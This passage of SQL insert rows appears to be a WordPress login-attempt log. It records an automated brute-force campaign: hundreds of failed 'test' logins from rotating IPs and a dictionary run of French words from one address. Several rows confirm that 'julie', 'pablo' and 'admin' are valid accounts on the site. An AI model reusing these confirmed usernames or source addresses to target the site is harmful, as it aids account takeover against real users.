(102800, 1499133607.560091, 1, 'loginFailInvalidUsername', 'test', 0, 3707610712, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102801, 1499133609.308690, 1, 'loginFailInvalidUsername', 'test', 0, 3707610712, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102802, 1499142278.768680, 1, 'loginFailInvalidUsername', 'test', 0, 701956706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102803, 1499142302.469163, 1, 'loginFailInvalidUsername', 'test', 0, 701956706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102804, 1499144295.108849, 1, 'loginFailInvalidUsername', 'test', 0, 623838970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102805, 1499144296.249316, 1, 'loginFailInvalidUsername', 'test', 0, 623838970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102806, 1499145039.397739, 1, 'loginFailInvalidUsername', 'test', 0, 409529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102807, 1499145040.492115, 1, 'loginFailInvalidUsername', 'test', 0, 409529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102808, 1499147039.182197, 1, 'loginFailInvalidUsername', 'test', 0, 1977819617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102809, 1499147040.818821, 1, 'loginFailInvalidUsername', 'test', 0, 1977819617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102810, 1499147614.621694, 1, 'loginFailInvalidUsername', 'test', 0, 1520582126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102811, 1499147615.830364, 1, 'loginFailInvalidUsername', 'test', 0, 1520582126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102812, 1499149393.329463, 1, 'loginFailInvalidUsername', 'test', 0, 1168938178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102813, 1499149394.808477, 1, 'loginFailInvalidUsername', 'test', 0, 1168938178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102814, 1499150691.364160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.61.24) Gecko/20173022 Firefox/45.61.24'),
(102815, 1499151004.286340, 1, 'loginFailInvalidUsername', 'test', 0, 1332931124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102816, 1499151006.085863, 1, 'loginFailInvalidUsername', 'test', 0, 1332931124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102817, 1499152376.565900, 1, 'loginFailInvalidUsername', 'test', 0, 3107509234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102818, 1499152377.589368, 1, 'loginFailInvalidUsername', 'test', 0, 3107509234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102819, 1499153495.634384, 1, 'loginFailInvalidUsername', 'test', 0, 2344808799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102820, 1499153497.439794, 1, 'loginFailInvalidUsername', 'test', 0, 2344808799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102821, 1499154120.788679, 1, 'loginFailInvalidUsername', 'test', 0, 2017338319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102822, 1499154132.121417, 1, 'loginFailInvalidUsername', 'test', 0, 2017338319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102823, 1499154843.111333, 1, 'loginFailInvalidUsername', 'test', 0, 1095466700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102824, 1499154844.384344, 1, 'loginFailInvalidUsername', 'test', 0, 1095466700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102825, 1499155037.602454, 1, 'loginFailInvalidUsername', 'test', 0, 1328687829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102826, 1499155038.819527, 1, 'loginFailInvalidUsername', 'test', 0, 1328687829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102827, 1499156928.760034, 1, 'loginFailInvalidUsername', 'test', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102828, 1499156931.893213, 1, 'loginFailInvalidUsername', 'test', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102829, 1499159152.576131, 1, 'loginFailInvalidUsername', 'test', 0, 2015137882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102830, 1499159154.165799, 1, 'loginFailInvalidUsername', 'test', 0, 2015137882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102831, 1499159471.704757, 1, 'loginFailInvalidUsername', 'test', 0, 1860242714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102832, 1499159473.103559, 1, 'loginFailInvalidUsername', 'test', 0, 1860242714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102833, 1499161117.192031, 1, 'loginFailInvalidUsername', 'test', 0, 712215576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102834, 1499161118.816199, 1, 'loginFailInvalidUsername', 'test', 0, 712215576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102835, 1499161315.980666, 1, 'loginFailInvalidUsername', 'test', 0, 3065577911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102836, 1499161318.061556, 1, 'loginFailInvalidUsername', 'test', 0, 3065577911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102837, 1499166767.718271, 1, 'loginFailInvalidUsername', 'test', 0, 694175085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102838, 1499166768.857099, 1, 'loginFailInvalidUsername', 'test', 0, 694175085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102839, 1499168133.259816, 1, 'loginFailInvalidUsername', 'test', 0, 3561984809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102840, 1499168360.176295, 1, 'loginFailInvalidUsername', 'test', 0, 1328993562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102841, 1499168361.155623, 1, 'loginFailInvalidUsername', 'test', 0, 1328993562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102842, 1499168855.540085, 1, 'loginFailInvalidUsername', 'test', 0, 1603060450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102843, 1499168856.624875, 1, 'loginFailInvalidUsername', 'test', 0, 1603060450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102844, 1499169179.324966, 1, 'loginFailInvalidUsername', 'test', 0, 1568064878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102845, 1499169180.301503, 1, 'loginFailInvalidUsername', 'test', 0, 1568064878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102846, 1499171226.671344, 1, 'loginFailInvalidUsername', 'test', 0, 2588319117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102847, 1499171228.267702, 1, 'loginFailInvalidUsername', 'test', 0, 2588319117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102848, 1499171405.474246, 1, 'loginFailInvalidUsername', 'test', 0, 1523763291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102849, 1499171407.385997, 1, 'loginFailInvalidUsername', 'test', 0, 1523763291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102850, 1499173309.663046, 1, 'loginFailInvalidUsername', 'test', 0, 2346371923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102851, 1499173311.383936, 1, 'loginFailInvalidUsername', 'test', 0, 2346371923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102852, 1499173636.155843, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102853, 1499173638.184587, 1, 'loginFailInvalidUsername', 'venez', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102854, 1499173640.339397, 1, 'loginFailInvalidUsername', 'outils', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102855, 1499173642.388643, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102856, 1499173644.379684, 1, 'loginFailInvalidUsername', 'travail', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102857, 1499173646.366799, 1, 'loginFailInvalidUsername', 'namur', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102858, 1499173649.089954, 1, 'loginFailInvalidUsername', 'center', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102859, 1499173651.280529, 1, 'loginFailValidUsername', 'julie', 2, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102860, 1499173653.256514, 1, 'loginFailValidUsername', 'pablo', 3, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102861, 1499173655.243257, 1, 'loginFailInvalidUsername', 'vous', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102862, 1499174397.995513, 1, 'loginFailInvalidUsername', 'test', 0, 689998245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102863, 1499174399.305702, 1, 'loginFailInvalidUsername', 'test', 0, 689998245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102864, 1499175684.327234, 1, 'loginFailInvalidUsername', 'test', 0, 1081591968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102865, 1499175685.549049, 1, 'loginFailInvalidUsername', 'test', 0, 1081591968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102866, 1499175999.971476, 1, 'loginFailInvalidUsername', 'test', 0, 1731720724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102867, 1499176001.280596, 1, 'loginFailInvalidUsername', 'test', 0, 1731720724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102868, 1499181832.981632, 1, 'loginFailInvalidUsername', 'test', 0, 459544882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102869, 1499181834.476537, 1, 'loginFailInvalidUsername', 'test', 0, 459544882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102870, 1499186842.056303, 1, 'loginFailInvalidUsername', 'test', 0, 1332400581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102871, 1499186843.466230, 1, 'loginFailInvalidUsername', 'test', 0, 1332400581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102872, 1499187466.555290, 1, 'loginFailInvalidUsername', 'test', 0, 1317177366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102873, 1499187467.616855, 1, 'loginFailInvalidUsername', 'test', 0, 1317177366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102874, 1499193386.282148, 1, 'loginFailInvalidUsername', 'test', 0, 3588707433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102875, 1499193387.308009, 1, 'loginFailInvalidUsername', 'test', 0, 3588707433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102876, 1499195817.037211, 1, 'loginFailInvalidUsername', 'test', 0, 3244113484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102877, 1499195818.236352, 1, 'loginFailInvalidUsername', 'test', 0, 3244113484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102878, 1499196671.452576, 1, 'loginFailInvalidUsername', 'test', 0, 3019778404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102879, 1499196673.077767, 1, 'loginFailInvalidUsername', 'test', 0, 3019778404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102880, 1499197344.989616, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.79.16 (KHTML, like Gecko) Chrome/55.1.6735.1463 Safari/532.08 OPR/42.0.4012.9740'),
(102881, 1499197994.665903, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102882, 1499197995.649006, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102883, 1499198427.362537, 1, 'loginFailInvalidUsername', 'test', 0, 3056617734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102884, 1499198428.922620, 1, 'loginFailInvalidUsername', 'test', 0, 3056617734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102885, 1499199861.496768, 1, 'loginFailInvalidUsername', 'test', 0, 3104980322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102886, 1499202528.834577, 1, 'loginFailInvalidUsername', 'test', 0, 1466890100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102887, 1499202530.036290, 1, 'loginFailInvalidUsername', 'test', 0, 1466890100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102888, 1499206900.326002, 1, 'loginFailInvalidUsername', 'test', 0, 1807545404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102889, 1499210805.701757, 1, 'loginFailInvalidUsername', 'test', 0, 1768344095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102890, 1499211381.831235, 1, 'loginFailInvalidUsername', 'test', 0, 1773851513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102891, 1499211384.858665, 1, 'loginFailInvalidUsername', 'test', 0, 1773851513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102892, 1499212035.345825, 1, 'loginFailInvalidUsername', 'test', 0, 2955898566, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102893, 1499213214.710340, 1, 'loginFailInvalidUsername', 'test', 0, 3122509240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102894, 1499213216.613085, 1, 'loginFailInvalidUsername', 'test', 0, 3122509240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102895, 1499213567.752139, 1, 'loginFailInvalidUsername', 'test', 0, 1496239585, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102896, 1499213568.893609, 1, 'loginFailInvalidUsername', 'test', 0, 1496239585, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102897, 1499214778.473498, 1, 'loginFailInvalidUsername', 'test', 0, 656658444, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102898, 1499214781.286107, 1, 'loginFailInvalidUsername', 'test', 0, 656658444, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102899, 1499216139.186706, 1, 'loginFailInvalidUsername', 'test', 0, 1333046822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102900, 1499216140.174829, 1, 'loginFailInvalidUsername', 'test', 0, 1333046822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102901, 1499217175.082038, 1, 'loginFailInvalidUsername', 'test', 0, 1768067581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102902, 1499217176.199552, 1, 'loginFailInvalidUsername', 'test', 0, 1768067581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102903, 1499220879.521308, 1, 'loginFailInvalidUsername', 'test', 0, 3588640443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102904, 1499220882.214309, 1, 'loginFailInvalidUsername', 'test', 0, 3588640443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102905, 1499223674.273788, 1, 'loginFailInvalidUsername', 'test', 0, 3388120925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102906, 1499223675.680145, 1, 'loginFailInvalidUsername', 'test', 0, 3388120925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102907, 1499224174.358322, 1, 'loginFailInvalidUsername', 'test', 0, 2977790027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102908, 1499224176.043336, 1, 'loginFailInvalidUsername', 'test', 0, 2977790027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102909, 1499226230.729704, 1, 'loginFailInvalidUsername', 'test', 0, 2332425310, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102910, 1499226232.021185, 1, 'loginFailInvalidUsername', 'test', 0, 2332425310, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102911, 1499227291.855121, 1, 'loginFailInvalidUsername', 'test', 0, 3111681667, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102912, 1499227292.889717, 1, 'loginFailInvalidUsername', 'test', 0, 3111681667, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102913, 1499229353.040905, 1, 'loginFailInvalidUsername', 'test', 0, 1445115722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102914, 1499229354.005797, 1, 'loginFailInvalidUsername', 'test', 0, 1445115722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102915, 1499235822.346113, 1, 'loginFailInvalidUsername', 'test', 0, 831707205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102916, 1499235824.196533, 1, 'loginFailInvalidUsername', 'test', 0, 831707205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102917, 1499235894.501177, 1, 'loginFailInvalidUsername', 'test', 0, 3000856442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102918, 1499235895.553806, 1, 'loginFailInvalidUsername', 'test', 0, 3000856442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102919, 1499236663.609922, 1, 'loginFailInvalidUsername', 'test', 0, 1839440452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102920, 1499236664.768266, 1, 'loginFailInvalidUsername', 'test', 0, 1839440452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102921, 1499239202.080760, 1, 'loginFailInvalidUsername', 'test', 0, 1550636993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102922, 1499239272.091851, 1, 'loginFailInvalidUsername', 'test', 0, 656512273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102923, 1499239402.290840, 1, 'loginFailValidUsername', 'julie', 2, 3399799176, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102924, 1499239404.848058, 1, 'loginFailValidUsername', 'admin', 1, 3510329944, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102925, 1499240723.000655, 1, 'loginFailInvalidUsername', 'test', 0, 1307519161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102926, 1499240723.931374, 1, 'loginFailInvalidUsername', 'test', 0, 1307519161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102927, 1499240763.062832, 1, 'loginFailInvalidUsername', 'test', 0, 459949731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102928, 1499240764.253936, 1, 'loginFailInvalidUsername', 'test', 0, 459949731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102929, 1499243653.076370, 1, 'loginFailInvalidUsername', 'test', 0, 1448283507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102930, 1499243657.065772, 1, 'loginFailInvalidUsername', 'test', 0, 1448283507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102931, 1499243884.835332, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.55.18) Gecko/20167444 Firefox/52.55.18'),
(102932, 1499244981.280964, 1, 'loginFailInvalidUsername', 'test', 0, 2588160204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102933, 1499244982.552472, 1, 'loginFailInvalidUsername', 'test', 0, 2588160204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102934, 1499245416.025057, 1, 'loginFailInvalidUsername', 'test', 0, 1081591866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102935, 1499245417.240062, 1, 'loginFailInvalidUsername', 'test', 0, 1081591866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102936, 1499245666.937825, 1, 'loginFailInvalidUsername', 'test', 0, 3032395560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102937, 1499245668.510612, 1, 'loginFailInvalidUsername', 'test', 0, 3032395560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102938, 1499246356.580126, 1, 'loginFailInvalidUsername', 'test', 0, 1445395224, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102939, 1499246357.682902, 1, 'loginFailInvalidUsername', 'test', 0, 1445395224, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102940, 1499247511.753672, 1, 'loginFailInvalidUsername', 'test', 0, 3158691865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102941, 1499247512.771448, 1, 'loginFailInvalidUsername', 'test', 0, 3158691865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102942, 1499248242.879542, 1, 'loginFailInvalidUsername', 'test', 0, 658244531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102943, 1499248244.794028, 1, 'loginFailInvalidUsername', 'test', 0, 658244531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102944, 1499250375.494762, 1, 'loginFailInvalidUsername', 'test', 0, 996019409, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102945, 1499251985.587932, 1, 'loginFailInvalidUsername', 'test', 0, 609188809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102946, 1499251987.529177, 1, 'loginFailInvalidUsername', 'test', 0, 609188809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102947, 1499252675.880969, 1, 'loginFailInvalidUsername', 'test', 0, 1047266096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102948, 1499252677.120377, 1, 'loginFailInvalidUsername', 'test', 0, 1047266096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102949, 1499253890.699367, 1, 'loginFailInvalidUsername', 'test', 0, 453277495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102950, 1499253891.914226, 1, 'loginFailInvalidUsername', 'test', 0, 453277495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
